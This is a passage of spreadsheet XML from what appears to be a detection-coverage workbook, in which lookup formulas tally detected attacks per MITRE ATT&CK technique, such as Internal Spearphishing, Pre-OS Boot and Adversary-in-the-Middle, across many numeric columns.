      <c r="CE51" s="12">
        <v>0</v>
      </c>
      <c r="CF51" s="12">
        <v>1</v>
      </c>
      <c r="CG51" s="13">
        <v>1</v>
      </c>
      <c r="CH51" s="394">
        <v>2</v>
      </c>
    </row>
    <row r="52" spans="1:86" ht="15" customHeight="1">
      <c r="A52" s="4">
        <f t="shared" si="13"/>
        <v>50</v>
      </c>
      <c r="B52" s="4" t="str">
        <f>IFERROR(VLOOKUP(A52,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1534</v>
      </c>
      <c r="C52" s="493" t="str">
        <f>IFERROR(VLOOKUP(B52,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Internal Spearphishing</v>
      </c>
      <c r="D52" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B52)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E52" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B52,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>10</v>
      </c>
      <c r="F52" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (10)</v>
      </c>
      <c r="G52" s="292">
        <v>10</v>
      </c>
      <c r="H52" s="322">
        <v>6</v>
      </c>
      <c r="I52" s="322" t="str">
        <f t="shared" si="0"/>
        <v>6 (10)</v>
      </c>
      <c r="J52" s="12">
        <v>3</v>
      </c>
      <c r="K52" s="13">
        <v>1</v>
      </c>
      <c r="L52" s="394">
        <v>5</v>
      </c>
      <c r="M52" s="322">
        <v>0</v>
      </c>
      <c r="N52" s="322">
        <v>0</v>
      </c>
      <c r="O52" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P52" s="12">
        <v>0</v>
      </c>
      <c r="Q52" s="13">
        <v>0</v>
      </c>
      <c r="R52" s="394">
        <v>0</v>
      </c>
      <c r="S52" s="292">
        <v>10</v>
      </c>
      <c r="T52" s="322">
        <v>6</v>
      </c>
      <c r="U52" s="322" t="str">
        <f t="shared" si="2"/>
        <v>6 (10)</v>
      </c>
      <c r="V52" s="12">
        <v>3</v>
      </c>
      <c r="W52" s="13">
        <v>1</v>
      </c>
      <c r="X52" s="394">
        <v>5</v>
      </c>
      <c r="Y52" s="392">
        <v>28</v>
      </c>
      <c r="Z52" s="392">
        <v>10</v>
      </c>
      <c r="AA52" s="322" t="str">
        <f t="shared" si="3"/>
        <v>10 (28)</v>
      </c>
      <c r="AB52" s="392">
        <v>7</v>
      </c>
      <c r="AC52" s="16">
        <v>1</v>
      </c>
      <c r="AD52" s="394">
        <v>5</v>
      </c>
      <c r="AE52" s="392">
        <v>6</v>
      </c>
      <c r="AF52" s="392">
        <v>4</v>
      </c>
      <c r="AG52" s="322" t="str">
        <f t="shared" si="4"/>
        <v>4 (6)</v>
      </c>
      <c r="AH52" s="392">
        <v>2</v>
      </c>
      <c r="AI52" s="16">
        <v>1</v>
      </c>
      <c r="AJ52" s="394">
        <v>2</v>
      </c>
      <c r="AK52" s="392">
        <v>34</v>
      </c>
      <c r="AL52" s="392">
        <v>14</v>
      </c>
      <c r="AM52" s="322" t="str">
        <f t="shared" si="5"/>
        <v>14 (34)</v>
      </c>
      <c r="AN52" s="392">
        <v>9</v>
      </c>
      <c r="AO52" s="16">
        <v>1</v>
      </c>
      <c r="AP52" s="394">
        <v>6</v>
      </c>
      <c r="AQ52" s="292">
        <v>0</v>
      </c>
      <c r="AR52" s="322">
        <v>0</v>
      </c>
      <c r="AS52" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT52" s="12">
        <v>0</v>
      </c>
      <c r="AU52" s="13">
        <v>0</v>
      </c>
      <c r="AV52" s="394">
        <v>0</v>
      </c>
      <c r="AW52" s="392">
        <v>15</v>
      </c>
      <c r="AX52" s="392">
        <v>2</v>
      </c>
      <c r="AY52" s="322" t="str">
        <f t="shared" si="7"/>
        <v>2 (15)</v>
      </c>
      <c r="AZ52" s="4">
        <v>2</v>
      </c>
      <c r="BA52" s="16">
        <v>1</v>
      </c>
      <c r="BB52" s="394">
        <v>2</v>
      </c>
      <c r="BC52" s="292">
        <v>25</v>
      </c>
      <c r="BD52" s="322">
        <v>8</v>
      </c>
      <c r="BE52" s="322" t="str">
        <f t="shared" si="8"/>
        <v>8 (25)</v>
      </c>
      <c r="BF52" s="12">
        <v>5</v>
      </c>
      <c r="BG52" s="13">
        <v>1</v>
      </c>
      <c r="BH52" s="394">
        <v>5</v>
      </c>
      <c r="BI52" s="292">
        <v>0</v>
      </c>
      <c r="BJ52" s="322">
        <v>0</v>
      </c>
      <c r="BK52" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL52" s="12">
        <v>0</v>
      </c>
      <c r="BM52" s="13">
        <v>0</v>
      </c>
      <c r="BN52" s="394">
        <v>0</v>
      </c>
      <c r="BO52" s="292">
        <v>10</v>
      </c>
      <c r="BP52" s="322">
        <v>10</v>
      </c>
      <c r="BQ52" s="322" t="str">
        <f t="shared" si="10"/>
        <v>10 (10)</v>
      </c>
      <c r="BR52" s="12">
        <v>0</v>
      </c>
      <c r="BS52" s="12">
        <v>4</v>
      </c>
      <c r="BT52" s="13">
        <v>1</v>
      </c>
      <c r="BU52" s="394">
        <v>10</v>
      </c>
      <c r="BV52" s="292">
        <v>0</v>
      </c>
      <c r="BW52" s="322">
        <v>0</v>
      </c>
      <c r="BX52" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY52" s="12">
        <v>0</v>
      </c>
      <c r="BZ52" s="13">
        <v>0</v>
      </c>
      <c r="CA52" s="394">
        <v>0</v>
      </c>
      <c r="CB52" s="292">
        <v>0</v>
      </c>
      <c r="CC52" s="322">
        <v>0</v>
      </c>
      <c r="CD52" s="322" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE52" s="12">
        <v>0</v>
      </c>
      <c r="CF52" s="12">
        <v>0</v>
      </c>
      <c r="CG52" s="13">
        <v>0</v>
      </c>
      <c r="CH52" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="53" spans="1:86" ht="15" customHeight="1">
      <c r="A53" s="4">
        <f t="shared" si="13"/>
        <v>51</v>
      </c>
      <c r="B53" s="4" t="str">
        <f>IFERROR(VLOOKUP(A53,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1537</v>
      </c>
      <c r="C53" s="493" t="str">
        <f>IFERROR(VLOOKUP(B53,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Transfer Data to Cloud Account</v>
      </c>
      <c r="D53" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B53)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E53" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B53,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>76</v>
      </c>
      <c r="F53" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (76)</v>
      </c>
      <c r="G53" s="292">
        <v>1</v>
      </c>
      <c r="H53" s="322">
        <v>1</v>
      </c>
      <c r="I53" s="322" t="str">
        <f t="shared" si="0"/>
        <v>1 (1)</v>
      </c>
      <c r="J53" s="12">
        <v>1</v>
      </c>
      <c r="K53" s="13">
        <v>1</v>
      </c>
      <c r="L53" s="394">
        <v>1</v>
      </c>
      <c r="M53" s="322">
        <v>0</v>
      </c>
      <c r="N53" s="322">
        <v>0</v>
      </c>
      <c r="O53" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P53" s="12">
        <v>0</v>
      </c>
      <c r="Q53" s="13">
        <v>0</v>
      </c>
      <c r="R53" s="394">
        <v>0</v>
      </c>
      <c r="S53" s="292">
        <v>1</v>
      </c>
      <c r="T53" s="322">
        <v>1</v>
      </c>
      <c r="U53" s="322" t="str">
        <f t="shared" si="2"/>
        <v>1 (1)</v>
      </c>
      <c r="V53" s="12">
        <v>1</v>
      </c>
      <c r="W53" s="13">
        <v>1</v>
      </c>
      <c r="X53" s="394">
        <v>1</v>
      </c>
      <c r="Y53" s="392">
        <v>9</v>
      </c>
      <c r="Z53" s="392">
        <v>9</v>
      </c>
      <c r="AA53" s="322" t="str">
        <f t="shared" si="3"/>
        <v>9 (9)</v>
      </c>
      <c r="AB53" s="392">
        <v>3</v>
      </c>
      <c r="AC53" s="16">
        <v>1</v>
      </c>
      <c r="AD53" s="394">
        <v>9</v>
      </c>
      <c r="AE53" s="392">
        <v>14</v>
      </c>
      <c r="AF53" s="392">
        <v>14</v>
      </c>
      <c r="AG53" s="322" t="str">
        <f t="shared" si="4"/>
        <v>14 (14)</v>
      </c>
      <c r="AH53" s="392">
        <v>2</v>
      </c>
      <c r="AI53" s="16">
        <v>1</v>
      </c>
      <c r="AJ53" s="394">
        <v>12</v>
      </c>
      <c r="AK53" s="392">
        <v>23</v>
      </c>
      <c r="AL53" s="392">
        <v>23</v>
      </c>
      <c r="AM53" s="322" t="str">
        <f t="shared" si="5"/>
        <v>23 (23)</v>
      </c>
      <c r="AN53" s="392">
        <v>5</v>
      </c>
      <c r="AO53" s="16">
        <v>1</v>
      </c>
      <c r="AP53" s="394">
        <v>18</v>
      </c>
      <c r="AQ53" s="292">
        <v>0</v>
      </c>
      <c r="AR53" s="322">
        <v>0</v>
      </c>
      <c r="AS53" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT53" s="12">
        <v>0</v>
      </c>
      <c r="AU53" s="13">
        <v>0</v>
      </c>
      <c r="AV53" s="394">
        <v>0</v>
      </c>
      <c r="AW53" s="392">
        <v>5</v>
      </c>
      <c r="AX53" s="392">
        <v>5</v>
      </c>
      <c r="AY53" s="322" t="str">
        <f t="shared" si="7"/>
        <v>5 (5)</v>
      </c>
      <c r="AZ53" s="4">
        <v>1</v>
      </c>
      <c r="BA53" s="16">
        <v>1</v>
      </c>
      <c r="BB53" s="394">
        <v>5</v>
      </c>
      <c r="BC53" s="292">
        <v>6</v>
      </c>
      <c r="BD53" s="322">
        <v>6</v>
      </c>
      <c r="BE53" s="322" t="str">
        <f t="shared" si="8"/>
        <v>6 (6)</v>
      </c>
      <c r="BF53" s="12">
        <v>2</v>
      </c>
      <c r="BG53" s="13">
        <v>1</v>
      </c>
      <c r="BH53" s="394">
        <v>6</v>
      </c>
      <c r="BI53" s="292">
        <v>0</v>
      </c>
      <c r="BJ53" s="322">
        <v>0</v>
      </c>
      <c r="BK53" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL53" s="12">
        <v>0</v>
      </c>
      <c r="BM53" s="13">
        <v>0</v>
      </c>
      <c r="BN53" s="394">
        <v>0</v>
      </c>
      <c r="BO53" s="292">
        <v>72</v>
      </c>
      <c r="BP53" s="322">
        <v>72</v>
      </c>
      <c r="BQ53" s="322" t="str">
        <f t="shared" si="10"/>
        <v>72 (72)</v>
      </c>
      <c r="BR53" s="12">
        <v>0</v>
      </c>
      <c r="BS53" s="12">
        <v>4</v>
      </c>
      <c r="BT53" s="13">
        <v>1</v>
      </c>
      <c r="BU53" s="394">
        <v>72</v>
      </c>
      <c r="BV53" s="292">
        <v>0</v>
      </c>
      <c r="BW53" s="322">
        <v>0</v>
      </c>
      <c r="BX53" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY53" s="12">
        <v>0</v>
      </c>
      <c r="BZ53" s="13">
        <v>0</v>
      </c>
      <c r="CA53" s="394">
        <v>0</v>
      </c>
      <c r="CB53" s="292">
        <v>0</v>
      </c>
      <c r="CC53" s="322">
        <v>0</v>
      </c>
      <c r="CD53" s="322" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE53" s="12">
        <v>0</v>
      </c>
      <c r="CF53" s="12">
        <v>0</v>
      </c>
      <c r="CG53" s="13">
        <v>0</v>
      </c>
      <c r="CH53" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="54" spans="1:86" ht="15" customHeight="1">
      <c r="A54" s="4">
        <f t="shared" si="13"/>
        <v>52</v>
      </c>
      <c r="B54" s="4" t="str">
        <f>IFERROR(VLOOKUP(A54,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1542</v>
      </c>
      <c r="C54" s="493" t="str">
        <f>IFERROR(VLOOKUP(B54,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Pre-OS Boot</v>
      </c>
      <c r="D54" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B54)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E54" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B54,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>13</v>
      </c>
      <c r="F54" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (13)</v>
      </c>
      <c r="G54" s="292">
        <v>14</v>
      </c>
      <c r="H54" s="322">
        <v>3</v>
      </c>
      <c r="I54" s="322" t="str">
        <f t="shared" si="0"/>
        <v>3 (14)</v>
      </c>
      <c r="J54" s="12">
        <v>3</v>
      </c>
      <c r="K54" s="13">
        <v>1</v>
      </c>
      <c r="L54" s="394">
        <v>2</v>
      </c>
      <c r="M54" s="322">
        <v>98</v>
      </c>
      <c r="N54" s="322">
        <v>6</v>
      </c>
      <c r="O54" s="322" t="str">
        <f t="shared" si="1"/>
        <v>6 (98)</v>
      </c>
      <c r="P54" s="12">
        <v>5</v>
      </c>
      <c r="Q54" s="13">
        <v>1</v>
      </c>
      <c r="R54" s="394">
        <v>3</v>
      </c>
      <c r="S54" s="292">
        <v>112</v>
      </c>
      <c r="T54" s="322">
        <v>9</v>
      </c>
      <c r="U54" s="322" t="str">
        <f t="shared" si="2"/>
        <v>9 (112)</v>
      </c>
      <c r="V54" s="12">
        <v>8</v>
      </c>
      <c r="W54" s="13">
        <v>1</v>
      </c>
      <c r="X54" s="394">
        <v>4</v>
      </c>
      <c r="Y54" s="392">
        <v>1697</v>
      </c>
      <c r="Z54" s="392">
        <v>20</v>
      </c>
      <c r="AA54" s="322" t="str">
        <f t="shared" si="3"/>
        <v>20 (1697)</v>
      </c>
      <c r="AB54" s="392">
        <v>18</v>
      </c>
      <c r="AC54" s="16">
        <v>1</v>
      </c>
      <c r="AD54" s="394">
        <v>6</v>
      </c>
      <c r="AE54" s="392">
        <v>3410</v>
      </c>
      <c r="AF54" s="392">
        <v>20</v>
      </c>
      <c r="AG54" s="322" t="str">
        <f t="shared" si="4"/>
        <v>20 (3410)</v>
      </c>
      <c r="AH54" s="392">
        <v>12</v>
      </c>
      <c r="AI54" s="16">
        <v>1</v>
      </c>
      <c r="AJ54" s="394">
        <v>8</v>
      </c>
      <c r="AK54" s="392">
        <v>5107</v>
      </c>
      <c r="AL54" s="392">
        <v>40</v>
      </c>
      <c r="AM54" s="322" t="str">
        <f t="shared" si="5"/>
        <v>40 (5107)</v>
      </c>
      <c r="AN54" s="392">
        <v>30</v>
      </c>
      <c r="AO54" s="16">
        <v>1</v>
      </c>
      <c r="AP54" s="394">
        <v>8</v>
      </c>
      <c r="AQ54" s="292">
        <v>0</v>
      </c>
      <c r="AR54" s="322">
        <v>0</v>
      </c>
      <c r="AS54" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT54" s="12">
        <v>0</v>
      </c>
      <c r="AU54" s="13">
        <v>0</v>
      </c>
      <c r="AV54" s="394">
        <v>0</v>
      </c>
      <c r="AW54" s="392">
        <v>8</v>
      </c>
      <c r="AX54" s="392">
        <v>5</v>
      </c>
      <c r="AY54" s="322" t="str">
        <f t="shared" si="7"/>
        <v>5 (8)</v>
      </c>
      <c r="AZ54" s="4">
        <v>4</v>
      </c>
      <c r="BA54" s="16">
        <v>1</v>
      </c>
      <c r="BB54" s="394">
        <v>4</v>
      </c>
      <c r="BC54" s="292">
        <v>120</v>
      </c>
      <c r="BD54" s="322">
        <v>14</v>
      </c>
      <c r="BE54" s="322" t="str">
        <f t="shared" si="8"/>
        <v>14 (120)</v>
      </c>
      <c r="BF54" s="12">
        <v>12</v>
      </c>
      <c r="BG54" s="13">
        <v>1</v>
      </c>
      <c r="BH54" s="394">
        <v>4</v>
      </c>
      <c r="BI54" s="292">
        <v>3</v>
      </c>
      <c r="BJ54" s="322">
        <v>2</v>
      </c>
      <c r="BK54" s="322" t="str">
        <f t="shared" si="9"/>
        <v>2 (3)</v>
      </c>
      <c r="BL54" s="12">
        <v>1</v>
      </c>
      <c r="BM54" s="13">
        <v>1</v>
      </c>
      <c r="BN54" s="394">
        <v>2</v>
      </c>
      <c r="BO54" s="292">
        <v>8</v>
      </c>
      <c r="BP54" s="322">
        <v>7</v>
      </c>
      <c r="BQ54" s="322" t="str">
        <f t="shared" si="10"/>
        <v>7 (8)</v>
      </c>
      <c r="BR54" s="12">
        <v>1</v>
      </c>
      <c r="BS54" s="12">
        <v>4</v>
      </c>
      <c r="BT54" s="13">
        <v>1</v>
      </c>
      <c r="BU54" s="394">
        <v>5</v>
      </c>
      <c r="BV54" s="292">
        <v>0</v>
      </c>
      <c r="BW54" s="322">
        <v>0</v>
      </c>
      <c r="BX54" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY54" s="12">
        <v>0</v>
      </c>
      <c r="BZ54" s="13">
        <v>0</v>
      </c>
      <c r="CA54" s="394">
        <v>0</v>
      </c>
      <c r="CB54" s="292">
        <v>2</v>
      </c>
      <c r="CC54" s="322">
        <v>2</v>
      </c>
      <c r="CD54" s="322" t="str">
        <f t="shared" si="12"/>
        <v>2 (2)</v>
      </c>
      <c r="CE54" s="12">
        <v>0</v>
      </c>
      <c r="CF54" s="12">
        <v>1</v>
      </c>
      <c r="CG54" s="13">
        <v>1</v>
      </c>
      <c r="CH54" s="394">
        <v>2</v>
      </c>
    </row>
    <row r="55" spans="1:86" ht="15" customHeight="1">
      <c r="A55" s="4">
        <f t="shared" si="13"/>
        <v>53</v>
      </c>
      <c r="B55" s="4" t="str">
        <f>IFERROR(VLOOKUP(A55,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1543</v>
      </c>
      <c r="C55" s="493" t="str">
        <f>IFERROR(VLOOKUP(B55,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Create or Modify System Process</v>
      </c>
      <c r="D55" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B55)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E55" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B55,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>3</v>
      </c>
      <c r="F55" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (3)</v>
      </c>
      <c r="G55" s="292">
        <v>2</v>
      </c>
      <c r="H55" s="322">
        <v>2</v>
      </c>
      <c r="I55" s="322" t="str">
        <f t="shared" si="0"/>
        <v>2 (2)</v>
      </c>
      <c r="J55" s="12">
        <v>1</v>
      </c>
      <c r="K55" s="13">
        <v>1</v>
      </c>
      <c r="L55" s="394">
        <v>2</v>
      </c>
      <c r="M55" s="322">
        <v>4</v>
      </c>
      <c r="N55" s="322">
        <v>4</v>
      </c>
      <c r="O55" s="322" t="str">
        <f t="shared" si="1"/>
        <v>4 (4)</v>
      </c>
      <c r="P55" s="12">
        <v>2</v>
      </c>
      <c r="Q55" s="13">
        <v>1</v>
      </c>
      <c r="R55" s="394">
        <v>2</v>
      </c>
      <c r="S55" s="292">
        <v>6</v>
      </c>
      <c r="T55" s="322">
        <v>6</v>
      </c>
      <c r="U55" s="322" t="str">
        <f t="shared" si="2"/>
        <v>6 (6)</v>
      </c>
      <c r="V55" s="12">
        <v>3</v>
      </c>
      <c r="W55" s="13">
        <v>1</v>
      </c>
      <c r="X55" s="394">
        <v>2</v>
      </c>
      <c r="Y55" s="392">
        <v>9</v>
      </c>
      <c r="Z55" s="392">
        <v>7</v>
      </c>
      <c r="AA55" s="322" t="str">
        <f t="shared" si="3"/>
        <v>7 (9)</v>
      </c>
      <c r="AB55" s="392">
        <v>4</v>
      </c>
      <c r="AC55" s="16">
        <v>1</v>
      </c>
      <c r="AD55" s="394">
        <v>3</v>
      </c>
      <c r="AE55" s="392">
        <v>12</v>
      </c>
      <c r="AF55" s="392">
        <v>8</v>
      </c>
      <c r="AG55" s="322" t="str">
        <f t="shared" si="4"/>
        <v>8 (12)</v>
      </c>
      <c r="AH55" s="392">
        <v>5</v>
      </c>
      <c r="AI55" s="16">
        <v>1</v>
      </c>
      <c r="AJ55" s="394">
        <v>2</v>
      </c>
      <c r="AK55" s="392">
        <v>21</v>
      </c>
      <c r="AL55" s="392">
        <v>15</v>
      </c>
      <c r="AM55" s="322" t="str">
        <f t="shared" si="5"/>
        <v>15 (21)</v>
      </c>
      <c r="AN55" s="392">
        <v>9</v>
      </c>
      <c r="AO55" s="16">
        <v>1</v>
      </c>
      <c r="AP55" s="394">
        <v>3</v>
      </c>
      <c r="AQ55" s="292">
        <v>0</v>
      </c>
      <c r="AR55" s="322">
        <v>0</v>
      </c>
      <c r="AS55" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT55" s="12">
        <v>0</v>
      </c>
      <c r="AU55" s="13">
        <v>0</v>
      </c>
      <c r="AV55" s="394">
        <v>0</v>
      </c>
      <c r="AW55" s="392">
        <v>0</v>
      </c>
      <c r="AX55" s="392">
        <v>0</v>
      </c>
      <c r="AY55" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ55" s="4">
        <v>0</v>
      </c>
      <c r="BA55" s="16">
        <v>0</v>
      </c>
      <c r="BB55" s="394">
        <v>0</v>
      </c>
      <c r="BC55" s="292">
        <v>6</v>
      </c>
      <c r="BD55" s="322">
        <v>6</v>
      </c>
      <c r="BE55" s="322" t="str">
        <f t="shared" si="8"/>
        <v>6 (6)</v>
      </c>
      <c r="BF55" s="12">
        <v>3</v>
      </c>
      <c r="BG55" s="13">
        <v>1</v>
      </c>
      <c r="BH55" s="394">
        <v>2</v>
      </c>
      <c r="BI55" s="292">
        <v>5</v>
      </c>
      <c r="BJ55" s="322">
        <v>3</v>
      </c>
      <c r="BK55" s="322" t="str">
        <f t="shared" si="9"/>
        <v>3 (5)</v>
      </c>
      <c r="BL55" s="12">
        <v>2</v>
      </c>
      <c r="BM55" s="13">
        <v>1</v>
      </c>
      <c r="BN55" s="394">
        <v>2</v>
      </c>
      <c r="BO55" s="292">
        <v>5</v>
      </c>
      <c r="BP55" s="322">
        <v>3</v>
      </c>
      <c r="BQ55" s="322" t="str">
        <f t="shared" si="10"/>
        <v>3 (5)</v>
      </c>
      <c r="BR55" s="12">
        <v>2</v>
      </c>
      <c r="BS55" s="12">
        <v>0</v>
      </c>
      <c r="BT55" s="13">
        <v>1</v>
      </c>
      <c r="BU55" s="394">
        <v>2</v>
      </c>
      <c r="BV55" s="292">
        <v>0</v>
      </c>
      <c r="BW55" s="322">
        <v>0</v>
      </c>
      <c r="BX55" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY55" s="12">
        <v>0</v>
      </c>
      <c r="BZ55" s="13">
        <v>0</v>
      </c>
      <c r="CA55" s="394">
        <v>0</v>
      </c>
      <c r="CB55" s="292">
        <v>0</v>
      </c>
      <c r="CC55" s="322">
        <v>0</v>
      </c>
      <c r="CD55" s="322" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE55" s="12">
        <v>0</v>
      </c>
      <c r="CF55" s="12">
        <v>0</v>
      </c>
      <c r="CG55" s="13">
        <v>0</v>
      </c>
      <c r="CH55" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="56" spans="1:86" ht="15" customHeight="1">
      <c r="A56" s="4">
        <f t="shared" si="13"/>
        <v>54</v>
      </c>
      <c r="B56" s="4" t="str">
        <f>IFERROR(VLOOKUP(A56,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1557</v>
      </c>
      <c r="C56" s="493" t="str">
        <f>IFERROR(VLOOKUP(B56,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Adversary-in-the-Middle</v>
      </c>
      <c r="D56" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B56)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E56" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B56,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>5</v>
      </c>
      <c r="F56" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (5)</v>
      </c>
      <c r="G56" s="292">
        <v>0</v>
      </c>
      <c r="H56" s="322">
        <v>0</v>
      </c>
      <c r="I56" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J56" s="12">
        <v>0</v>
      </c>
      <c r="K56" s="13">
        <v>0</v>
      </c>
      <c r="L56" s="394">
        <v>0</v>
      </c>
      <c r="M56" s="322">
        <v>0</v>
      </c>
      <c r="N56" s="322">
        <v>0</v>
      </c>
      <c r="O56" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P56" s="12">
        <v>0</v>
      </c>
      <c r="Q56" s="13">
        <v>0</v>
      </c>
      <c r="R56" s="394">
        <v>0</v>
      </c>
      <c r="S56" s="292">
        <v>0</v>
      </c>
      <c r="T56" s="322">
        <v>0</v>
      </c>
      <c r="U56" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V56" s="12">
        <v>0</v>
      </c>
      <c r="W56" s="13">
        <v>0</v>
      </c>
      <c r="X56" s="394">
        <v>0</v>
      </c>
      <c r="Y56" s="392">
        <v>2</v>
      </c>
      <c r="Z56" s="392">
        <v>1</v>
      </c>
      <c r="AA56" s="322" t="str">
        <f t="shared" si="3"/>
        <v>1 (2)</v>
      </c>
      <c r="AB56" s="392">
        <v>1</v>
      </c>
      <c r="AC56" s="16">
        <v>1</v>
      </c>
      <c r="AD56" s="394">
        <v>1</v>
      </c>
      <c r="AE56" s="392">
        <v>70</v>
      </c>
      <c r="AF56" s="392">
        <v>3</v>
      </c>
      <c r="AG56" s="322" t="str">
        <f t="shared" si="4"/>
        <v>3 (70)</v>
      </c>
      <c r="AH56" s="392">
        <v>3</v>
      </c>
      <c r="AI56" s="16">
        <v>1</v>
      </c>
      <c r="AJ56" s="394">
        <v>2</v>
      </c>
      <c r="AK56" s="392">
        <v>72</v>
      </c>
      <c r="AL56" s="392">
        <v>4</v>
      </c>
      <c r="AM56" s="322" t="str">
        <f t="shared" si="5"/>
        <v>4 (72)</v>
      </c>
      <c r="AN56" s="392">
        <v>4</v>
      </c>
      <c r="AO56" s="16">
        <v>1</v>
      </c>
      <c r="AP56" s="394">
        <v>2</v>
      </c>
      <c r="AQ56" s="292">
        <v>0</v>
      </c>
      <c r="AR56" s="322">
        <v>0</v>
      </c>
      <c r="AS56" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT56" s="12">
        <v>0</v>
      </c>
      <c r="AU56" s="13">
        <v>0</v>
      </c>
      <c r="AV56" s="394">
        <v>0</v>
      </c>
      <c r="AW56" s="392">
        <v>0</v>
      </c>
      <c r="AX56" s="392">
        <v>0</v>
      </c>
      <c r="AY56" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ56" s="4">
        <v>0</v>
      </c>
      <c r="BA56" s="16">
        <v>0</v>
      </c>
      <c r="BB56" s="394">
        <v>0</v>
      </c>
      <c r="BC56" s="292">
        <v>0</v>
      </c>
      <c r="BD56" s="322">
        <v>0</v>
      </c>
      <c r="BE56" s="322" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BF56" s="12">
        <v>0</v>
      </c>
      <c r="BG56" s="13">
        <v>0</v>
      </c>
      <c r="BH56" s="394">
        <v>0</v>
      </c>
      <c r="BI56" s="292">
        <v>0</v>
      </c>
      <c r="BJ56" s="322">
        <v>0</v>
      </c>
      <c r="BK56" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL56" s="12">
        <v>0</v>
      </c>
      <c r="BM56" s="13">
        <v>0</v>
      </c>
      <c r="BN56" s="394">
        <v>0</v>
      </c>
      <c r="BO56" s="292">
        <v>6</v>
      </c>
      <c r="BP56" s="322">
        <v>6</v>
      </c>
      <c r="BQ56" s="322" t="str">
        <f t="shared" si="10"/>
        <v>6 (6)</v>
      </c>
